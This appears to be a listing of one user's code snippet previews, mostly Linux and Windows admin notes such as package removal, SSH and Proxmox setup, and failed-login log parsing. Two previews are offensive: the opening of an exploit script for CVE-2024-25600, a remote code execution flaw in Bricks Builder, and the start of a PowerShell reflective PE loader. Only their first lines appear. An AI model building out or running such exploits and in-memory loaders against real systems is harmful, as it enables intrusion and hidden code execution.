timsonner

Remove bloat from Gnome/Debian Trixie

sudo apt purge --autoremove -y \
  gnome-software gnome-software-plugin-deb gnome-software-plugin-fwupd \
  "libreoffice*" "mythes-*" "hyphen-*" "hunspell-*" \
  "fcitx*" "mozc*" "anthy*" ibus-anthy \
  "hdate*" libhdate-common \
  "dict-*" "goldendict*" \
  "mlterm*" xiterm+thai \
  thunderbird yelp \

timsonner

# CVE-2024-25600 (Bricks Builder RCE)

     import requests
     import sys
     import urllib3
     import re

     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

     def fetch_nonce(target_url):

timsonner

Bash Bangers

Copy 1st line from file, insert into first line of another file

awk 'NR==1' test.py | xargs -I{} sed -i '1s/.*/{}/' slice.py

Setup Python debugger pdb in file

timsonner

Parse failed logins - Linux

Extract IP addresses from /var/log/secure

grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' /var/log/secure | sort| uniq -u

Extract usernames from failed login attempts from lastb

lastb | awk '{print $1}' | sort | uniq -u

timsonner

Kali setup

# Get rid of Kali xfce
apt remove kali-desktop-xfce --allow-remove-essential
apt purge kali-desktop-xfce --autoremove
# Install xfce
apt install xfce4 lightdm
# Get rid of firefox
apt remove firefox-esr --allow-remove-essential

timsonner

Linux SSH server setup and key pair generation

SSH server setup

# Install SSH server
apt install openssh-server
# Enable SSH server on startup
systemctl enable ssh
# Check SSH server status
systemctl status ssh

timsonner

OpenCTI docker setup for MacOS

Clone OpenCTI repo

git clone https://github.com/OpenCTI-Platform/docker.git
cd docker

Create .env file for OpenCTI setup for MacOS (use official docs for windows/linux)

create-env.sh

timsonner

ProxMox Developer Workstation setup

• Install ProxMox as usual
• Edit /etc/network/interfaces to reflect the correct IP and interface of ethernet adapter
• Edit /etc/resolv.conf to reflect DNS server, likely gateway of router or switch

Once internet connection established, install gnome

apt install gnome

timsonner

PowerShell - View Windows Security Event Logs

A reference for triaging security alerts

Common Event IDs

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx

Event ID	Description
4624	An account was successfully logged on
4625	An account failed to log on

timsonner

# Reflectively load a PE file
$code = @"
using System;
using System.Runtime.InteropServices;
using System.IO;

public class PELoader
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr GetCurrentProcess();